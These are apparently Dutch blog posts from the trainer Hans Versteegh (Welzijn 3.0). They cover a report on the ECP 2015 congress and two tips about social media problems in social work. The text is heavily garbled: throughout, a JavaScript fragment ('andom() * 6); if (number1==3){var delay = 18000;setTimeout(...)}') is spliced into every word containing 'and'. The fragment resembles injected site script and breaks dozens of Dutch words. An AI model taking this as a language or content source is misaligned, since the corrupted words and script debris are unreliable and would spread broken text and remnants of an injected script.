IMG_8240Het aantal uitleningen van boeken neemt af door digitalisering. Biebs p
rofileren zich nu nadrukkelijk op werk en inkomen en vaardigheden ontwikkelen / educatie. De bibliotheken moeten ook hun relevantie aantonen om niet, net als het welzijnswerk,  wegbezuinigd te worden.

Men stelde dat er minder schaamte is voor ontbreken van digitale vaardigheden dan voor laaggeletterdheid. Een kwart van deze groep komt toch nu en dan in de bieb. Daar kunnen ze meedoen aan Taal voor het leven. Digisterker. Klik&Tik. Workshops DigiD en Werk.nl. Bibliotheek voor ondernemers enzovoorts.

Financiering komt meestal vanuit gemeentelijke WEB-gelden 2015-2016.

De activiteiten hebben als spin off dat groepen verder gaan op Social media. Op Facebook en Linkedin houden deelnemers contact. De trainingen worden gegeven door goed opgeleide vrijwilligers. Vaak betreft het “camouflage trainingen” waar digitale vaardigheden bijvangst zijn.

IMG_8244Les voor het sociaal werk … ga samenwerken met de lokale bibliotheek en kijk wat je samen kan neerzetten. Voor je overlappende doelgroep en om je meerwaarde aan te tonen.

Lunch (geweldig!)

Sessie 3, Innovatie in het onderwijs, Digitaal leren in een stroomversnelling Door GEU-bestuurslid Eric Razenberg

De trend in onderwijs-middelen-ontwikkeling-landom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}and is digitaler en persoonlijker / individueler. Het mediagebruik van kinderen door de dag heen kent 2 dips: nl. wanneer ze op school zitten. Dat is een veeg teken dat het onderwijs achterloopt op de werkelijkheid. Het is een uitdaging voor docenten om te verandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}anderen en digitale middelen te aanvaarden en in onderwijs te integreren.

IMG_8245Boeken zijn goedkoper. Vaak te gebruiken. Samen met digitale middelen inzetten is duur. Maar de trend om technologie te integreren is wel stijgend.

Want het is aantrekkelijk voor kinderen, het sluit goed bij ze aan. Het genereert efficiënter onderwijs. En een grotere motivatie on te leren. Leerlingen besteden digitaal meer tijd aan het leren waardoor betere resultaten worden geboekt en ze sneller door de stof heen gaan.

Om docenten digivaardiger te maken: http://www.stichting-leerkracht.nl/kom-langs-bij-leerkracht/

https://www.thiememeulenhoff.nl/primair-onderwijs/mijn-talent/mijn-talent/mijn-talent/over-mijn-talent/zo-werkt-mijn-talent/demo-mijn-talent? is een digitaal ondersteund programma. Leerlingen kiezen zelf wat ze willen leren en gaan zappend door het aanbod.

De nieuwe werkelijkheid bleek in de zaal toen een toehoorder interrumpeerde met: “Ik ben scholier en ondernemer.”

Sessie 4, Netkids 2020

De laatste sessie van vandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andaag. Marjolijn Bonthuis (ECP) gaat in gesprek met Pedro de Bruyckere en Remco Pijpers.

Remco Pijpers en Pedro de Bruyckere op Jaarcongres ECP 2015

Remco Pijpers en Pedro de Bruyckere op Jaarcongres ECP 2015

Begonnen werd met https://minecraft.net, een open eind spel dat je zelf vormgeeft. Is dit wat we willen? Is dit goed voor onze kinderen? Het Internet of toys, waar speelgoed met elkaar communiceert? Kinderen die Siri ontdekken en dus tegen apparaten gaan praten?

Hoe hoger opgeleid je ouders hoe sneller je digitale ontwikkeling gaat. We maken een omslag van protectie van kinderen naar empowerment. Van gelijke toegang tot gelijke ontwikkeling. Ook hier een pleidooi om verplicht programmeren op school in te voeren.

Afgelopen 15 jaar draaide het om technologie, om de knoppen zeg maar. Nu om wie we zijn en wat we willen (zijn) in verhouding tot die technologie.

Pedro De Bruykere schreef het boek Ik was 10 in 2015 #10in2015 / http://www.lannoo.be/ik-was-10-2015

Zullen er nog genoeg mensen zijn die het werk kunnen doen in een verrijzende wereldbevolking? Zullen kinderen rond hun 40e, na hun scheiding, weer terug thuis komen wonen? Hoe bereid je ze voor op de toekomst? In ieder geval: leer ze autonoom zijn en strategische vaardigheden. Acteren in mensenljjke netwerken is essentieel. Leer ze niet dat ze niet met een dronken kop op Facebook moeten gaan staan (lokaal is dat niet slim) maar gelijk dat ze Iets positiefs online zetten over zichzelf waaraan ze wel herinnerd willen worden als ze ouder zijn.

Mogen kinderen nog jong zijn? Vrije tijd en vrije ruimte staan onder druk. Waneer spelen kinderen zonder toezicht? Meisjes worden in onderzoeken nog wel eens vergeten, die zitten geïsoleerd op hun slaapkamers. Jongens gamen of zijn op straat en veel zichtbaarder.

Vergeten is onderbelicht. Plaats maken. Ruimte om te experimenteren. Fantastische verhalen maken waar je later je unieke versie van maakt, en over op kunt scheppen, omdat er geen camera in de buurt was om het vast te leggen. Onze kinderen maken dat nauwelijks nog mee.

Deze ruimte staat onder druk. Door angst van opvoeders. Jongeren gebruiken nu zo veel sociale media omdat het de laatste plaats is zonder toezicht.

Volle bak op het Jaarcongres ECP 2015, ben jij er volgend jaar ook bij?Tijd en vergeten staan onder druk. Plaats jij foto’s van de 20 weken ego’s van je ongeboren kind op Facebook? En wat de je de jaren daarna met afbeeldingen van je kind? Ouders en toekomstig ouders moeten hoognodig mediawijs worden.

Kortom, genoeg stof om over na te denken en volop tips en inspiratie voor het ontwikkelen van digitale vaardigheden en innovatie. Volgend jaar meer.

Hans Versteegh, Welzijn 3.0

 

Afrekenen met social media knelpunt nummer 7, resultaten blijven uit.

Resultaten blijven uit, 27% noemde dit lastig te grijpen knelpunt. Niet alleen omdat er te weinig resultaten zijn. Maar ook omdat dit zeer diverse oorzaken kan hebben. Misschien moet je de volgende checklist even nalopen:

Het model Pondres

Dit is het model van Pondres. Ik gebruik het in mijn trainingen om deelnemers een goede social media strategie te laten opzetten. Wanneer resultaten uitblijven kan het goed zijn om de fases hieruit goed te doorlopen. Of dat opnieuw te doen. Je hebt dan in ieder geval niks overgeslagen.

Diepere oorzaken voor weinig resultaten
Maar dat is nog niet automatisch een garantie voor succes. Binnen de genoemde fases kan ook nog van alles niet goed gaan. Kijk bijvoorbeeld nog eens naar de eerste knelpunten waar dit eBook mee begon. Lees die hoofdstukken nog een keer. Misschien herken jij je hierin? De drie meest genoemde knelpunten hebben te maken met fase 5, “Strategische opties.”

• Er is weinig geld en tijd beschikbaar
Beide moeten vanuit je organisatie natuurlijk wel voorhandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}anden zijn. De inzet van social media gaat niet vanzelf, je doet het er – in het begin – niet even bij. Probeer je dat wel, dan vallen resultaten altijd tegen.

• Draagvlak ontbreekt
Ben jij de enige die met social media aan de slag wil of is er een groep medestandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}anders te vinden? Hoe denken je collega’s over deze innovatie? Overwegend positief of juist niet? Resultaten zullen toenemen wanneer iedereen er het nut van inziet en mogelijk ook zelf actief in wordt. Je straalt dan met z’n allen een sterk merk uit naar buiten.

• Angst voor negatieve publiciteit
Dit zit dieper, bij jezelf? Waar komt die angst vandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andaan? Of zit het in de cultuur van je organisatie wellicht? Of is het een blokkade van een sleutelfiguur in je organisatie waardoor je niet de middelen krijgt en innovatie wordt tegen gehouden? Angst weerhoudt je er van er vol voor te gaan. Probeer er dus doorheen te breken wanneer je meer resultaten van je inzet wil zien.

Warme suggesties
Geef sociale media de tijd zich te bewijzen. En de tijd om te groeien. Net als een netwerk opbouwen of een bedrijf winstgevend te maken kost het moeite en tijd om volgers aan je te binden en hen te bieden wat ze zoeken.

Luister, reageer, discussieer en meet natuurlijk.
En als laatste, je moet het natuurlijk zelf ook nog leuk vinden! Iets dat je niet leuk vind geef je misschien minder aandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andacht. En dat zie je terug in het resultaat.

Welzijn 3.0, Hans Versteegh

Hartelijke groeten,
Hans Versteegh
De sociaalste social media trainer, Welzijn 3.0
Mail mij op  h.versteegh@welzijn30.nl of bel mij op 06-44062029.

p.s. Wil je meer van deze tips? Dit knelpunt en andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}anderen staan ook in het e-book “Jij kan het ook! Afrekenen met social media knelpunten in Welzijn.” dat binnenkort verschijnt. Wil je dat ontvangen, schrijf je dan in via het formulier hieronder aan de pagina.

Wil je zelf aan de slag? Dat kan met de online basistraining social media voor sociaal werk: https://www.welzijn30.nl/leer-online-met-de-social-social-media-academie/

BewarenBewaren

BewarenBewaren

BewarenBewaren

Afrekenen met social media knelpunt 6, niet weten wat je moet vertellen

Niet weten wat je moet vertellen. Maar liefst 27% noemde dit. “Wat heb ik nou te vertellen, wie zit er op mij te wachten? Ik heb geen idee waar ik het over zou moeten hebben.” Herken je deze vraag? Lees dan even verder, want het klopt niet. Jij bent zelf namelijk altijd interessant voor andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}anderen! En je bent bovendien in staat op een goede en makkelijke manier van je te laten horen op sociale media. Hierna lees je hoe je dat aanpakt.

Blijf dicht bij jezelf
Het is lastig precies te weten wat een andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}ander nou interesseert en dus ook wat je moet plaatsen op sociale media. Natuurlijk kan je gokken en kijken wat er na ieder bericht gebeurd. Of je kan je verdiepen in je doelgroep. Maar met pakweg 250 en meer volgers is het onmogelijk van iedereen te weten wat ze zoeken.

Er rest je dus niets andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}anders dan terug te keren naar jezelf. Jij kent jezelf het beste, jij weet waar jij mee bezig bent. En jij kent je eigen werk het beste. Jij bent daar dus de expert in en kunt daar over vertellen. Laat je dus niet te veel leiden door wat jij denkt dat een andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}ander zoekt (of van je vindt) maar blijf dicht bij jezelf en het werk dat jij doet. Dan komen vanzelf de volgers naar je toe die bij je passen. De rest laat je lekker voor wat ze zijn, tot ze ook ontdekken wie jij bent.

Laat je zien, ga over jezelf vertellen
Mensen volgen (en nemen diensten af van) mensen. Dus het is prima iets van jezelf te laten zien op sociale media. Als je functie dat toelaat. Wij mensen zijn namelijk allemaal nieuwsgierig naar elkaar. En in het sociale werk dat jij doet neem je altijd al jezelf mee, in hoge mate zelfs. Wees dus gewoon jezelf op sociale media, je klanten zullen jou daar in herkennen.

pannenkoekHou je in je vrije tijd van wandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andelen in de bergen? Plaats dan af en toe een foto van een mooi landom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andschap waar je bent geweest. Werk je in je vrije tijd als vrijwilliger voor het Rode Kruis, vertel dan een keer wat je daar hebt meegemaakt. Heb je  kinderen, zoals ik, dan is het niet vreemd dat je laat zien dat je een keer pannenkoeken voor ze bakt. Dat heeft allemaal niks met je werk te maken maar wel met wie jij als persoon bent. Daar kom ik zo op terug.

Basisvragen
Er zijn een paar basisvragen die jij aan jezelf kunt stellen om er achter te komen wat je zou kunnen gaan vertellen en plaatsen op social media. Het zijn vragen die over jou gaan.

 • Wie ben jij?
 • Wat doe je?
 • Voor wie doe je dat?
 • Waarom doe je dat?

Waarom? The why?
De antwoorden geven je al richting voor hetgeen je kunt plaatsen op sociale media. Vooral die laatste, het waarom, is essentieel. Waarom heb jij voor je vak gekozen? Waarom wil jij andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}anderen helpen? Waarom verkoop je geen schoenen of ben je zeezeiler, maar doe je dit?

In het beantwoorden van het waarom zit de waarde verscholen die jij andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}anderen geeft. Jij bent ergens goed en gedreven in. Juist dat maakt je interessant voor andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}anderen, die daar naar op zoek zijn. Dus zal het de moeite waard zijn daarover op sociale media te praten en publiceren.

Het belang van de waarom-vraag wordt prachtig uitgelegd door Simon Sinek, die ik in mijn social media trainingen ook regelmatig aanhaal. Bekijk zijn filmpje maar eens over “The why.”

Help jezelf met een geheugensteun
Wanneer je weet waarom je doet wat je doet moet je er misschien nog de woorden bij vinden. Wat helpt is die op een rij te zetten.  Dat kan in een content management matrix. Een content management matrix is een tabel met een aantal kolommen waaronder je trefwoorden noteert. Een goede content management matrix is een onderdeel van je social media strategie.
Bijvoorbeeld zoals dit:

Bedrijf Vakgebied Specialiteit die in huis is Lokale activiteiten Persoonlijke interesses Problemen van klanten Sites en andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andere inspiratiebronnen

Bedrijf, waar werk je, ook als je zzp-er bent. Omschrijf je bedrijf in kernwoorden.
Vakgebied, wat is je vakgebied, wat kom je daar in tegen?
Je specialiteit, waar ben jij goed in en wat maakt jou uniek?
Lokale activiteiten, zijn er zaken in de buurt waar je aan mee doet of die je steunt?
Persoonlijke interesses, wie is die -interessante- berg-wandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andelende, vrijwillig werkende of pannenkoeken-bakkende mens achter de functie die je hebt?
Problemen van klanten, wat help jij op te lossen, waar zit hun pijn?
Sites en andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andere inspiratiebronnen, waar haal jij je kennis vandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andaan?

Je kunt zo’n content management matrix aanvullen met nog meer kolommen en vullen met veel trefwoorden, maar hou het een beetje overzichtelijk. Heb je eenmaal goed nagedacht over deze lijst dan heb je altijd een overzicht van onderwerpen waarover jij zou kunnen berichten op sociale media. En je hebt bovendien de mogelijkheid afwisseling in je berichten te stoppen zonder dat het afwijkt van je focus. Pak de matrix er bij wanneer je nieuwe berichten gaat schrijven voor je sociale media.

Dus aarzel niet langer. Je weet wie jij bent en wat je waard bent. Laat dat zien!

Met dank aan Jannetta Dorsman, collega social media trainer en marketeer, voor de matrix.

p.s. Wil je meer van deze tips? Dit knelpunt en andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}anderen staan ook in het e-book “Jij kan het ook! Afrekenen met social media knelpunten in Welzijn.” dat binnenkort verschijnt. Wil je dat ontvangen, schrijf je dan in via het formulier hieronder aan de pagina.

Lees ook:

vergeetmenietjes

BewarenBewaren